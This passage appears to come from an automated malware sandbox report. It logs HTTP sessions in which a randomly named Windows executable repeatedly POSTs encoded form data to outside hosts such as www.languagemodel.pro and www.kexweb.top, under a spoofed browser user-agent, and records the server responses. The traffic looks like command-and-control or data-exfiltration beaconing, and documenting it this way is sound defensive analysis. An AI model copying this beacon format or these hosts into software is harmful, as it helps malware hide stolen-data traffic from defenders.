              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 55 64 5a 71 6f 51 70 6c 49 64 45 38 35 46 5a 65 75 35 51 74 79 4f 42 36 56 48 38 49 53 7a 59 6e 66 41 76 4e 73 52 36 4e 35 75 58 69 69 4c 44 43 41 3d 3d
              Data Ascii: H0QP6=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdUdZqoQplIdE85FZeu5QtyOB6VH8ISzYnfAvNsR6N5uXiiLDCA==
              Sep 22, 2024 17:36:15.771171093 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:15 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.749724217.70.184.50805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:17.711430073 CEST860OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 36 2b 58 6a 4b 66 30 75 74 6c 65 45 33 41 4f 6c 62 53 4f 4c 39 76 77 71 48 55 31 7a 49 79 6d 46 4a 6a 39 55 6d 75 7a 68 55 43 5a 33 54 4c 41 63 3d
              Data Ascii: H0QP6=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj26+XjKf0utleE3AOlbSOL9vwqHU1zIymFJj9UmuzhUCZ3TLAc=
              Sep 22, 2024 17:36:18.306798935 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:18 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.749725217.70.184.50805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:20.256956100 CEST1873OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 59 6a 2f 35 42 2b 57 4f 70 59 69 52 36 46 68 46 6e 50 57 55 7a 61 6a 2f 67 49 50 2f 55 31 66 4e 62 70 32 54 71 64 63 79 2b 6b 69 30 56 61 71 63 73 4c 70 58 59 41 55 5a 44 6a 56 31 4d 37 6c 75 45 55 39 74 77 6f 64 61 4a 63 72 78 63 72 53 39 4b 79 53 55 41 48 53 46 6f 4a 39 64 69 6c 4f 62 65 4a 30 57 70 68 38 6f 44 43 44 61 4f 37 61 52 2f 33 64 76 4b 6c 51 6d 54 72 71 71 51 69 54 67 34 4c 38 4c 5a 6a 74 37 55 4b 51 58 5a 45 71 6d 36 4a 71 70 7a 51 51 37 6a 38 77 74 6f 38 4b 2b 4d 53 [TRUNCATED]
              Data Ascii: H0QP6=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Yj/5B+WOpYiR6FhFnPWUzaj/gIP/U1fNbp2Tqdcy+ki0VaqcsLpXYAUZDjV1M7luEU9twodaJcrxcrS9KySUAHSFoJ9dilObeJ0Wph8oDCDaO7aR/3dvKlQmTrqqQiTg4L8LZjt7UKQXZEqm6JqpzQQ7j8wto8K+MSqzh/lygzhKTtfMJ65QFl2r1tk+8keesun/LXud3fRomXeu/lcZ6vJZ4Gpqg8wqZnvzB2RFoOjBo0e0dOWlxb2B/+7tuoOtCKDeGiqVkfuGXzzmNgVPpEr/59voHNxV0NJEpJbBua23SS8CMAsC2zodEvyu3PY6i9JGHkIZJgxRsVvb56nOEGTkQVxBSnetD8wE35gZQjPljvEJOl54dA5XCxGeOvkHy2qJK7+GvO61npD26UGRKDqVco0CCtm39dZj/zoxqm7Dw0sjFjkj+yOWxzSn8eQgUoWnAEqkU/AUOyZxVHeVHxYUZMldgAgmQ5MQEumSrY3NLNbiTUSWW3zaBTihpsrq5uV5XJBka1TEEDaAzJKLONPNDGGXqzCb1LjJN2ZNVn/n3msSB9GLRBlSeQk82zHzN6onptYmAjYnKJ/DIBYhzUqJChCVJeYZVMFqRdp5QyRwaUK6MM10ljnUnJ4lydzgg3DcS8zbN/vDFOTyn16s/zvmpj+IUFK5GOyNOmpvfQ6qHrvPwU7enT3b0usDxDVqx67K4FTVOpWmPpDl8dTTIx/u0r5wUgvh37X5G8oO71tHo1yKQ6ESjgtX1jmVdofC2WZIWjsKjbcpZSuB9+vOSUYRBVVPF5FMY3mWkGjIIXOPxKdBJI98JPL5/xmLynDGJgR+ [TRUNCATED]
              Sep 22, 2024 17:36:20.860364914 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:20 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.749726217.70.184.50805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:22.800704956 CEST568OUTGET /nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:36:23.407097101 CEST1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:23 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Language
              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
              Sep 22, 2024 17:36:23.407460928 CEST914INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.74972763.250.47.40805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:28.662138939 CEST819OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 67 77 46 2b 4a 6d 55 76 37 69 5a 63 73 78 53 48 41 4a 4c 72 6f 6a 62 71 62 79 4b 56 72 38 6d 72 30 49 2f 46 79 4a 4f 35 4d 37 41 75 61 71 44 79 77 3d 3d
              Data Ascii: H0QP6=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqgwF+JmUv7iZcsxSHAJLrojbqbyKVr8mr0I/FyJO5M7AuaqDyw==
              Sep 22, 2024 17:36:29.258941889 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:29 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.74972863.250.47.40805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:31.215193033 CEST839OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 62 67 75 5a 57 38 43 4e 68 54 70 31 4d 6e 49 51 39 76 6d 37 65 71 6a 49 4c 48 6b 50 73 57 37 6e 47 6e 77 59 30 4d 59 2b 2f 6c 35 46 72 4e 56 4a 45 3d
              Data Ascii: H0QP6=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bguZW8CNhTp1MnIQ9vm7eqjILHkPsW7nGnwY0MY+/l5FrNVJE=
              Sep 22, 2024 17:36:31.828917980 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:31 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.74972963.250.47.40805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
